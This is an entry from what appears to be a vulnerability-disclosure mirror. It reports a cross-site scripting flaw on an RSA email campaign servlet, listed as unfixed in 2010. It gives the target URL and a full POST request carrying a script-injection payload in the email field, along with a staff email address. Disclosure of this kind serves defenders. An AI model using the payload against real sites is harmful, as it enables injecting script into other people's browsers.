Security researcher Xylitol, has submitted on 13/09/2010 a cross-site-scripting (XSS) vulnerability affecting rsa-email.rsa.com, which at the time of submission ranked 91994 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/09/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 13/09/2010 |
Date published: 29/09/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: Xylitol |
Domain: rsa-email.rsa.com |
Category: XSS |
Pagerank: 91994 |
URL: https://rsa-email.rsa.com/servlet/campaignrespondent |
POST: email='"></title><script>alert(1337)</script>&remembercheck=on&rememberme=yes&source1=HB&ID=Event_W_ Wombat_Phishing_Q310&CUST_ID=1&CUST_MAIL=kconnearney%40rsasecurity.com&_ID_=rsa.3166.-2&Campaign_=Re gistration+Login+Webform&charset_=ISO-8859-1&_InlineResponseRule_=true&_Sent_=2010-09-13+14%3A40%3A1 0.332&_checkbox_=remembercheck&TIMESTAMP_=2003-08-22+12%3A09%3A59.000&EMail_=kconnearney%40rsasecuri ty.com&__HIDDEN_FIELD_NAMES__=rememberme%3Bsource1%3BID%3BCUST_ID%3BCUST_MAIL%3B_ID_%3BCampaign_%3Bc harset_%3B_InlineResponseRule_%3B_Sent_%3B_checkbox_%3BTIMESTAMP_%3BEMail_%3B__HIDDEN_FIELD_NAMES__ |
Click here to view the mirror
|
|
|